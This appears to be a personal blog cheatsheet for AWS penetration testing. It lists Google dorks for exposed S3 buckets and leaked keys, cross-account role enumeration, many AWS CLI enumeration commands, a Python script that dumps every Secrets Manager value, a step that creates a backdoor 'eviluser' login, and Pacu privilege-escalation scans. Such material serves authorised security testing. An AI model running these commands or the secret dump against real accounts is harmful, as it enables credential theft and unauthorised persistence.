AWS pentesting may seem a bit annoying, but once you understand all the services and the possibilities of lateral movements and the potential for lateral movements and privilege escalation due to common misconfigurations, trust me, can be fun :), here’s just a little personal cheatsheet with commands that help me when I have to list an AWS environment.
Index
Unauthenticated Enumeration
Just try to find leaks with credentials/keys, or use cross-account policies in order to enumerate users/roles/services (you need the target account ID at least).
Resources:
- aws-role-enumeration-iam
- aws-iam-user-enumeration
- enumerating-services-in-aws-accounts
- This tool looks good and is referred in the posts, but I couldn’t get work :(:( Quiet-riot , An enumeration tool for scalable, unauthenticated validation of AWS..
Dorks
S3:
1
2
3
4
5
6
7
8
9
10
11
12
site:http://s3.amazonaws.com intitle:index.of.bucket
site:http://amazonaws.com inurl:".s3.amazonaws.com/"
site:.s3.amazonaws.com "Company"
intitle:index.of.bucket
site:http://s3.amazonaws.com intitle:Bucket loading
site:*.amazonaws.com inurl:index.html
site:s3.amazonaws.com filetype:sql
site:s3.amazonaws.com filetype:json
site:s3.amazonaws.com intext:"AccessKeyId"
site:s3.amazonaws.com ext:log
Creds/Keys:
1
2
3
4
5
6
filename:.bash_profile aws
rds.amazonaws.com password
filename:credentials aws_access_key_id
filename:credentials aws_secret_access_key
Cross-Account ("Unauthenticated") Reconnaissance
Enumerate Users and Roles :
You got keys?, WhoAreYou?:
1
aws sts get-caller-identity --query "Arn" --output text | cut -d'/' -f2
- Just create a bucket on your own aws account and apply a policy. By specifying a principal in the target account , you can determine if that principals exists. If setting the bucket policy succeeds you know the role exists. If it fails you know the role does not.
- You can enumerate users and roles.
- You can do it manually, or using Pacu (iam__enum_roles module), or using this script: https://github.com/Frichetten/enumate_iam_using_bucket_policy-
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Example permissions",
"Effect": "Deny",
"Principal": {
"AWS": "arn:aws:iam::TargetAccountID:role/role_name"
},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::*bucket you own*"
}
]
}
Authenticated Enumeration
To find possible ways to allow lateral movement between accounts, or escalation of privileges, it is important to list them:
- What permissions does my user have?
- Which groups does my user belong to? –> What policies are attached to that groups?
- What roles has my user assigned? –> What policies are attached to these roles?
- Can my user assume other roles?
- Can my user attach policies?
General enum, basic commands
- Set AWS programmatic keys for authentication (use –profile= for a new profile)
1
aws configure
- Enumerate users:
1
aws iam list-users
- Enumerate all buckets
1
aws s3api list-buckets --query "Buckets[].Name"
- Enumerate Groups:
1
aws iam list-groups
- Enumerate IAM roles:
1
aws iam list-roles
- Enumerate IAM policies:
1
aws iam list-policies
- Enumerate lambda layers:
1
aws lambda list-layers
- Enumerate VPCs:
1
aws ec2 describe-vpcs
- Enumerate WebApps:
1
aws deploy list-applications
- Instance Metadata Service URL:
1
curl http://169.254.169.254/latest/meta-data
General enum, deep commands
- Enumerate caller identity (whoami):
1
aws sts get-caller identity
- Enumerate login profile:
1
aws iam get-login-profile --user-name $user
- Enumerate Groups for that user:
1
aws iam list-groups-for-user --user-name $user
- Enumerate policies attached to that user:
1
aws iam list-attached-user-policies --user-name $user
- Enumerate certificates for that user:
1
aws iam list-signing-certificates --user-name $user
- Enumerate SSH keys for that user:
1
aws iam list-ssh-public-keys --user-name $user
- Get SSH Keys details:
1 2
aws iam get-ssh-public-key --user-name &user --encoding PEM --ssh-public-key-id APKAUAWOPGE5M47NZEIT
- Check MFA devices for users:
1
aws iam list-virtual-mfa-devices
- Enumerate policies
1
aws iam list-policies
- Enumerate group attached Policies:
1 2
aws iam list-group-policies --group-name ad-admin aws iam list-attached-group-policies --group-name ad-admin
- Searching for customer managed policies
1
aws iam list-policies --scope Local | grep -A2 PolicyName
- Check for policy details of ad-customer-managed-policy.
1 2
aws iam get-policy --policy-arn arn:aws:iam::276384657722:policy/ad-customer-managed-policy
- Get the policy version document to check permissions that the policy grants
1 2
aws iam get-policy-version --policy-arn arn:aws:iam::276384657722:policy/ad-customer-managed-policy --version-id v1
- Enumerate roles
1
aws iam list-roles
- Enumerate details for roles
1
aws iam get-role --role-name ad-loggingrole
- Enumerate policies attached to roles
1 2
aws iam list-attached-role-policies --role-name ad-loggingrole aws iam list-role-policies --role-name ad-loggingrole
S3 Enumeration
- List S3 Buckets:
1
aws s3api list-buckets
- Enumerate bucket objects:
1 2
aws s3api list-objects-v2 --bucket data-extractor-repo aws s3api list-objects --bucket file-uploader-saved-files
- Check if S3 bucket is public:
1
aws s3api get-public-access-block --bucket data-extractor-repo
- Download objects from tS3 bucket:
1
aws s3 cp s3://file-uploader-saved-files/flag
- Create a bucket:
1
aws s3api create-bucket --bucket my-bucket --region us-east-1
- Enumerate Bucket Location:
1
aws s3api get-bucket-location --bucket data-extractor-repo
- Enumerate object versions:
1
aws s3api list-object-versions --bucket data-extractor-repo
- Enumerate bucket policy:
1 2
aws s3api get-bucket-policy --bucket insecurecorp-code --output text | python -m json.tool
- Enumerate buckets ACLs and object ACLs:
1 2
aws s3api get-bucket-acl --bucket file-uploader-saved-files aws s3api get-object-acl --bucket file-uploader-saved-files --key flag
- Modify bucket policy :
1
aws s3api put-bucket-policy --bucket $bucketName --policy file://policy.json
- Modify bucket ACL:
1
aws s3api put-bucket-acl --bucket $bucketName --access-control-policy file://acl.json
EC2 Commands
- Enumerate information about all instances:
1
aws ec2 describe-instances
- Enumerate information about a specific region:
1
aws ec2 describe-instances --region $region
- Enumerate information about specific instance:
1 2
aws ec2 describe-instances --instance-ids $ID aws ec2 describe-instance-attribute --attribute userData --region $region --instance-id $instanceId --query UserData.Value --output text > encodeddata; base64 --decode encodeddata
- Enumerate EC2 subnets:
1
aws ec2 describe-subnets
- Enumerate EC2 network interfaces:
1
aws ec2 describe-network-interfaces
- List DirectConnect (VPN) connections
1
aws directconnect describe-connections
Lambda Commands
- Enumerate lambda layers:
1
aws lambda list-layers
- Enumerate lambda layers versions and compatible runtimes:
1
aws lambda list-layer-versions --layer-name php-runtime
- Enumerate lambda layer version information:
1
aws lambda get-layer-version --layer-name php-runtime --version-number 2
- Enumerate lambda functions:
1
aws lambda list-functions
- Enumerate lambda function details:
1
aws lambda get-function --function-name $functionName
Enumerate events:
1
aws lambda list-event-source-mappings --function-name $functionName
Databases Commands
- Enumerate tables associated with the current account:
1
aws dynamodb list-tables
- Enumerate information about the table:
1
aws dynamodb describe-table --table-name $tableName
- Enumerate items and attributes in a table:
1
aws dynamodb scan --table-name $tableName
- Enumerate backup of a table:
1
aws dynamodb describe-backup --backup-arn $backupArn
- Add new table to your account:
1
aws dynamodb create-table --attribute-definitions --table-name --key-schema
- Edit an item attribute or adds new item to the table:
1
aws dynamodb update-item --table-name --key
- List AWS RDS (SQL):
1
aws rds describe-db-instances --region $regionName
Secrets enumeration Commands
- List all secrets, sorts by Name:
1
aws secretsmanager list-secrets --query 'sort_by(SecretList, &Name)[]'
- Get specific secret , as jq:
1
aws secretsmanager get-secret-value --secret-id $SECRET_ID | jq -r ".SecretString"
- Python3 script, get all secrets:
1
2
3
4
5
6
7
8
9
10
11
12
#!/usr/bin/env python3
import json
import subprocess
secrets = json.loads(subprocess.getoutput("aws secretsmanager list-secrets"))
for secret in secrets.values():
for s in secret:
name = s.get('Name')
data = json.loads(subprocess.getoutput("aws secretsmanager get-secret-value --secret-id {}".format(name)))
value = data.get('SecretString')
print("{}: {}".format(name, value))
Persistence [IN PROGRESS...]
Create new user and enable login with password
- Create user:
1
aws iam create-user --user-name eviluser
- Create user:
- Create login profile, you can use the next json example:
1 2 3 4 5 6
cat create-login-profile.json { "UserName": "eviluser", "Password": "SuperSecretPassword", "PasswordResetRequired": false }
- Create login profile, you can use the next json example:
- Use this login profile and attach to the new user:
1
aws iam create-login-profile --cli-input-json file://create-login-profile.json
- Use this login profile and attach to the new user:
Tools
Pacu
Installation:
1
2
3
mkdir pacu && cd pacu
python3 -m venv venv && source venv/bin/activate
pip install -U pacu
- Import AWS keys for a specific profile
1
import_keys <profile name>
- Detect if keys are honey token keys
1
run iam__detect_honeytokens
- Enumerate account information and permissions
1 2 3
run iam__enum_users_roles_policies_groups run iam__enum_permissions whoami
- Check for privilege escalation
1
run iam__privesc_scan
Scoutsuite
Installation:
1
2
3
4
5
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
scout –help
scout aws --profile myprofile
Scoutsuit vulns:
Just a list of common ScoutSuite vulns and how to check them: